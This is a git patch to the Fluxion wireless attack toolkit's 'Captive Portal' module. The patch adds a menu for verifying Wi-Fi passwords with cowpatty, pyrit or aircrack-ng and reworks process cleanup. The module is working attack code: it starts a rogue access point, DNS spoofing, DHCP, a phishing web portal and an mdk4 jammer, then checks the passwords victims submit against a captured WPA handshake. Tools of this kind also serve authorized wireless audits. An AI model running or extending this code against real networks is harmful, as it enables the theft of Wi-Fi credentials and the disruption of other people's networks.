From 597275372b88d02546986c6ff856b9f9eef5c0c4 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Sun, 26 Apr 2020 02:46:05 -0500 Subject: [PATCH] Added discrete options to authenticator. The authenticator may now be directed to use one of cowpatty, pyrit, or aircrack-ng, for password verification. --- attacks/Captive Portal/attack.sh | 169 +++++++++++++------------- attacks/Captive Portal/language/en.sh | 3 + 2 files changed, 90 insertions(+), 82 deletions(-) diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index 4162d7c..0af405f 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -8,11 +8,6 @@ CaptivePortalState="Not Ready" CaptivePortalPassLog="$FLUXIONPath/attacks/Captive Portal/pwdlog" CaptivePortalNetLog="$FLUXIONPath/attacks/Captive Portal/netlog" -CaptivePortalAuthenticationMethods=("hash") # "wpa_supplicant") -CaptivePortalAuthenticationMethodsInfo=( - "(handshake file, ${CGrn}recommended$CClr)" -) # "(Target AP authentication, slow)") - # ============= < Virtual Network Configuration > ============ # # To avoid collapsing with an already existing network, # we'll use a somewhat uncommon network and server IP. @@ -205,7 +200,7 @@ captive_portal_unset_authenticator() { if [ ! "$CaptivePortalAuthenticatorMode" ]; then return 0; fi case "$CaptivePortalAuthenticatorMode" in - "hash") + "hash"*) echo "Unset hash is done automatically." > $FLUXIONOutputDevice ;; esac @@ -214,15 +209,15 @@ captive_portal_unset_authenticator() { # If we've only got one option, then the user skipped this section # by auto-selecting that single option, so we unset the previous # phase along with this one to properly take the user back. - if [ ${#CaptivePortalAuthenticationMethods[@]} -le 1 ]; then - return 1 # Trigger undo chain because it was auto-selected. - fi + #if [ ${#CaptivePortalAuthenticationMethods[@]} -le 1 ]; then + # return 1 # Trigger undo chain because it was auto-selected. + #fi } captive_portal_set_authenticator() { if [ "$CaptivePortalAuthenticatorMode" ]; then case "$CaptivePortalAuthenticatorMode" in - "hash") + "hash"*) if [ "$CaptivePortalHashPath" ]; then echo "Captive Portal authentication mode is already set, skipping!" \ > $FLUXIONOutputDevice @@ -234,46 +229,47 @@ captive_portal_set_authenticator() { captive_portal_unset_authenticator - # If we've got only one choice, auto-select it for the user. - if [ \ - ${#CaptivePortalAuthenticationMethods[@]} -eq 1 -o \ - ${#CaptivePortalAuthenticationMethods[@]} -ge 1 -a \ - "$FLUXIONAuto" ]; then - CaptivePortalAuthenticatorMode="${CaptivePortalAuthenticationMethods[0]}" - echo "Auto-selected auth-method: $CaptivePortalAuthenticatorMode" \ - > $FLUXIONOutputDevice - else - fluxion_header + # # If we've got only one choice, auto-select it for the user. + #if [ \ + # ${#CaptivePortalAuthenticationMethods[@]} -eq 1 -o \ + # ${#CaptivePortalAuthenticationMethods[@]} -ge 1 -a \ + # "$FLUXIONAuto" ]; then + # CaptivePortalAuthenticatorMode="${CaptivePortalAuthenticationMethods[0]}" + # echo "Auto-selected auth-method: $CaptivePortalAuthenticatorMode" \ + # > $FLUXIONOutputDevice + #else + fluxion_header - echo -e "$FLUXIONVLine $CaptivePortalVerificationMethodQuery" - echo + echo -e "$FLUXIONVLine $CaptivePortalVerificationMethodQuery" + echo - fluxion_target_show + fluxion_target_show - local choices=( - "${CaptivePortalAuthenticationMethods[@]}" - "$FLUXIONGeneralBackOption" - ) - io_query_format_fields "" "\t$CRed[$CYel%d$CRed]$CClr %b %b\n" \ - choices[@] CaptivePortalAuthenticationMethodsInfo[@] + local choices=( + "$CaptivePortalVerificationMethodPyritOption" + "$CaptivePortalVerificationMethodCowpattyOption" + "$CaptivePortalVerificationMethodAircrackNG" + "$FLUXIONGeneralBackOption" + ) + io_query_choice "" choices[@] - echo + echo - CaptivePortalAuthenticatorMode="${IOQueryFormatFields[0]}" + CaptivePortalAuthenticatorMode="${IOQueryChoice}" - # If we're going back, reset everything and abort. - if [[ \ - "$CaptivePortalAuthenticatorMode" == \ - "$FLUXIONGeneralBackOption" ]]; then - captive_portal_unset_authenticator - return -1 - fi + # If we're going back, reset everything and abort. + if [[ \ + "$CaptivePortalAuthenticatorMode" == \ + "$FLUXIONGeneralBackOption" ]]; then + captive_portal_unset_authenticator + return -1 fi + #fi # Process the authentication method selected. local result=1 # Assume failure at first. case "$CaptivePortalAuthenticatorMode" in - "hash") + "hash"*) # Pass default path if no path is set yet. if [ ! "$CaptivePortalHashPath" ]; then CaptivePortalHashPath="$FLUXIONPath/attacks/Handshake Snooper/handshakes/$FluxionTargetSSIDClean-$FluxionTargetMAC.cap" @@ -848,38 +844,34 @@ while [ \$AuthenticatorState = \"running\" ]; do " >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" - if [ $CaptivePortalAuthenticatorMode = "hash" ]; then - # 05/26/19: Default to cowpatty for verification since aircrack-ng appears to have a bug. - if which cowpatty &> /dev/null; then - echo " - if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then - if cowpatty -f \"$FLUXIONWorkspacePath/candidate.txt\" -r \"$CaptivePortalHashPath\" -s \"$FluxionTargetSSID\" &> /dev/null; then - echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\" + if [[ "$CaptivePortalAuthenticatorMode" = "hash"* ]]; then + case "$CaptivePortalAuthenticatorMode" in + # Cowpatty + "$CaptivePortalVerificationMethodCowpattyOption") + local -r verifiedCondition="cowpatty -f \"$FLUXIONWorkspacePath/candidate.txt\" -r \"$CaptivePortalHashPath\" -s \"$FluxionTargetSSID\" &> $FLUXIONOutputDevice" + ;; + # Pyrit + "$CaptivePortalVerificationMethodPyritOption") + local -r verifiedCondition="pyrit -r \"$CaptivePortalHashPath\" -i \"$FLUXIONWorkspacePath/candidate.txt\" -b $FluxionTargetMAC attack_passthrough &> $FLUXIONOutputDevice" + ;; - sleep 1 - break - - else - echo \"1\" > \"$FLUXIONWorkspacePath/candidate_result.txt\" - - fi - fi" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" - else - echo " - if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then - # Check if we've got the correct password by looking for anything other than \"Passphrase not in\" or \"KEY NOT FOUND\". - if ! aircrack-ng -b $FluxionTargetMAC -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$CaptivePortalHashPath\" | egrep -qi \"Passphrase not in|KEY NOT FOUND\"; then - echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\" - - sleep 1 - break - - else - echo \"1\" > \"$FLUXIONWorkspacePath/candidate_result.txt\" - - fi - fi" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" - fi + *) + # Aircrack-ng + # Check if we've got the correct password by looking for + # anything other than \"Passphrase not in\" or \"KEY NOT FOUND\". + local -r verifiedCondition="aircrack-ng -b $FluxionTargetMAC -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$CaptivePortalHashPath\" | egrep -qi \"Passphrase not in|KEY NOT FOUND\"" + ;; + esac + echo " + if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then + if $verifiedCondition; then + echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\" + sleep 1 + break + else + echo \"1\" > \"$FLUXIONWorkspacePath/candidate_result.txt\" + fi + fi" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" fi local -r staticSSID=$(printf "%q" "$FluxionTargetSSID" | sed -r 's/\\\ / /g' | sed -r "s/\\\'/\'/g") @@ -922,7 +914,7 @@ while [ \$AuthenticatorState = \"running\" ]; do echo -ne \"\033[K\033[u\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" - if [ $CaptivePortalAuthenticatorMode = "hash" ]; then + if [[ "$CaptivePortalAuthenticatorMode" = "hash"* ]]; then echo " sleep 1" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" fi @@ -953,7 +945,7 @@ Mac: $(captive_portal_get_IP_MAC) ($(captive_portal_get_MAC_brand)) IP: $(captive_portal_get_client_IP) \" >\"$CaptivePortalNetLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" - if [ $CaptivePortalAuthenticatorMode = "hash" ]; then + if [[ "$CaptivePortalAuthenticatorMode" = "hash"* ]]; then # echo " # aircrack-ng -a 2 -b $FluxionTargetMAC -0 -s \"$CaptivePortalHashPath\" -w \"$FLUXIONWorkspacePath/candidate.txt\" && echo && echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log"$CClr"\"\ #" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" @@ -1345,41 +1337,43 @@ save_attack() { stop_attack() { # Attempt to find PIDs of any running authenticators. - local authenticatorPID=$(ps a | grep -vE "xterm|grep" | grep captive_portal_authenticator.sh | awk '{print $1}') + #local authenticatorPID=$(pgrep + #local authenticatorPID=$( \ + # ps a | grep -vE "xterm|grep" | \ + # grep captive_portal_authenticator.sh | awk '{print $1}' \ + #) # Signal any authenticator to stop authentication loop. - if [ "$authenticatorPID" ]; then kill -s SIGABRT $authenticatorPID; fi + fluxion_kill_lineage "--signal SIGABRT" \ + "xterm.+captive_portal_authenticator\\.sh" if [ "$CaptivePortalJammerServiceXtermPID" ]; then - kill $(pgrep -P $CaptivePortalJammerServiceXtermPID \ - 2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice + fluxion_kill_lineage $CaptivePortalJammerServiceXtermPID CaptivePortalJammerServiceXtermPID="" # Clear parent PID fi sandbox_remove_workfile "$FLUXIONWorkspacePath/mdk4_blacklist.lst" # Kill captive portal web server log viewer. if [ "$CaptivePortalWebServiceXtermPID" ]; then - kill $CaptivePortalWebServiceXtermPID &> $FLUXIONOutputDevice + fluxion_kill_lineage $CaptivePortalWebServiceXtermPID CaptivePortalWebServiceXtermPID="" # Clear service PID fi # Kill captive portal web server. if [ "$CaptivePortalWebServicePID" ]; then - kill $CaptivePortalWebServicePID &> $FLUXIONOutputDevice + fluxion_kill_lineage $CaptivePortalWebServicePID CaptivePortalWebServicePID="" # Clear service PID fi # Kill DNS service if one is found. if [ "$CaptivePortalDNSServiceXtermPID" ]; then - kill $(pgrep -P $CaptivePortalDNSServiceXtermPID \ - 2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice + fluxion_kill_lineage $CaptivePortalDNSServiceXtermPID CaptivePortalDNSServiceXtermPID="" # Clear parent PID fi # Kill DHCP service. if [ "$CaptivePortalDHCPServiceXtermPID" ]; then - kill $(pgrep -P $CaptivePortalDHCPServiceXtermPID \ - 2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice + fluxion_kill_lineage $CaptivePortalDHCPServiceXtermPID CaptivePortalDHCPServiceXtermPID="" # Clear parent PID fi sandbox_remove_workfile "$FLUXIONWorkspacePath/clients.txt" @@ -1432,6 +1426,8 @@ start_attack() { "dhcpd -d -f -lf \"$FLUXIONWorkspacePath/dhcpd.leases\" -cf \"$FLUXIONWorkspacePath/dhcpd.conf\" $CaptivePortalAccessInterface 2>&1 | tee -a \"$FLUXIONWorkspacePath/clients.txt\"" & # Save parent's pid, to get to child later. CaptivePortalDHCPServiceXtermPID=$! + echo "DHCP Service: $CaptivePortalDHCPServiceXtermPID" + >> $FLUXIONOutputDevice echo -e "$FLUXIONVLine $CaptivePortalStartingDNSServiceNotice" xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg black -fg "#99CCFF" \ @@ -1439,6 +1435,8 @@ start_attack() { "dnsspoof -i ${CaptivePortalAccessInterface} -f \"$FLUXIONWorkspacePath/hosts\"" & # Save parent's pid, to get to child later. CaptivePortalDNSServiceXtermPID=$! + echo "DNS Service: $CaptivePortalDNSServiceXtermPID" + >> $FLUXIONOutputDevice echo -e "$FLUXIONVLine $CaptivePortalStartingWebServiceNotice" lighttpd -f "$FLUXIONWorkspacePath/lighttpd.conf" \ @@ -1449,6 +1447,8 @@ start_attack() { -title "FLUXION Web Service" -e \ "tail -f \"$FLUXIONWorkspacePath/lighttpd.log\"" & CaptivePortalWebServiceXtermPID=$! + echo "Web Service: $CaptivePortalWebServiceXtermPID" + >> $FLUXIONOutputDevice echo -e "$FLUXIONVLine $CaptivePortalStartingJammerServiceNotice" echo -e "$FluxionTargetMAC" >"$FLUXIONWorkspacePath/mdk4_blacklist.lst" @@ -1482,12 +1482,17 @@ start_attack() { # Save parent's pid, to get to child later. CaptivePortalJammerServiceXtermPID=$! fi + echo "Jammer Service: $CaptivePortalJammerServiceXtermPID" + >> $FLUXIONOutputDevice echo -e "$FLUXIONVLine $CaptivePortalStartingAuthenticatorServiceNotice" xterm -hold $TOPRIGHT -bg black -fg "#CCCCCC" \ -title "FLUXION AP Authenticator" \ -e "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" & + local -r authService=$! + echo "Auth Service: $authService" + >> $FLUXIONOutputDevice } # FLUXSCRIPT END diff --git a/attacks/Captive Portal/language/en.sh b/attacks/Captive Portal/language/en.sh index 0b6723e..d82ebe7 100755 --- a/attacks/Captive Portal/language/en.sh +++ b/attacks/Captive Portal/language/en.sh @@ -19,6 +19,9 @@ CaptivePortalAPServiceHostapdOption="Rogue AP - hostapd (${CGrn}recommended$CClr CaptivePortalAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}slow$CClr)" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> CaptivePortalVerificationMethodQuery="Select a password verification method" +CaptivePortalVerificationMethodPyritOption="hash - pyrit" +CaptivePortalVerificationMethodCowpattyOption="hash - cowpatty" +CaptivePortalVerificationMethodAircrackNG="hash - aircrack-ng (default, ${CYel}unreliable${CClr})" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> CaptivePortalCertificateSourceQuery="Select SSL certificate source for captive portal." CaptivePortalCertificateSourceGenerateOption="Create an SSL certificate"